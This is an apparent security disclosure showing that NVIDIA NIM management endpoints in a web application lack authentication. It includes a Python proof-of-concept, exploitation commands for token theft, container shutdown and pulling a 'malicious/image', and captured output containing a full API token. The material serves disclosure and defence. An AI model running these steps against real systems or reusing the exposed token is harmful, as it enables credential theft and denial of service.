Token obtained:

{
  "access_token": "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",
  "token_type": "Bearer",
  "expires_in": 3600
}

Token validation:

curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
# Returns list of 170+ available models

2. Container Runtime Manipulation

On systems with Docker/NIM installed, an unauthenticated attacker can:

• List running containers (reconnaissance)
• Stop containers (Denial of Service)
• Start containers with arbitrary images
• Pull arbitrary Docker images (resource consumption, potential malicious images)

Proof of Concept

poc.py

#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated

Usage:
  python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""

import argparse
import urllib.request
import urllib.error

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
    ap.add_argument("--path", required=True, help="NIM endpoint path")
    ap.add_argument("--method", default="GET", choices=["GET", "POST"])
    ap.add_argument("--data", default="", help="Raw request body for POST")
    args = ap.parse_args()

    url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
    body = args.data.encode("utf-8") if args.method == "POST" else None
    req = urllib.request.Request(
        url,
        data=body,
        method=args.method,
        headers={"Content-Type": "application/json"} if body else {},
    )

    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            print(r.read().decode("utf-8", errors="replace"))
    except urllib.error.HTTPError as e:
        print(e.read().decode("utf-8", errors="replace"))

if __name__ == "__main__":
    main()

Exploitation Steps

# 1. Obtain NVIDIA API token (no authentication required)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token

# 2. List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers

# 3. Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
  --method POST --data '{"containerId":"<target_id>"}'

# 4. Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
  --method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'

Evidence

Token retrieval without authentication:

$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
{"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null}

Token grants access to NVIDIA API:

$ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
{"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]}

Container endpoints return 500 (not 401) proving auth bypass:

$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
{"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}}

References

• CWE-306: Missing Authentication for Critical Function
• OWASP API Security Top 10 - API2:2023 Broken Authentication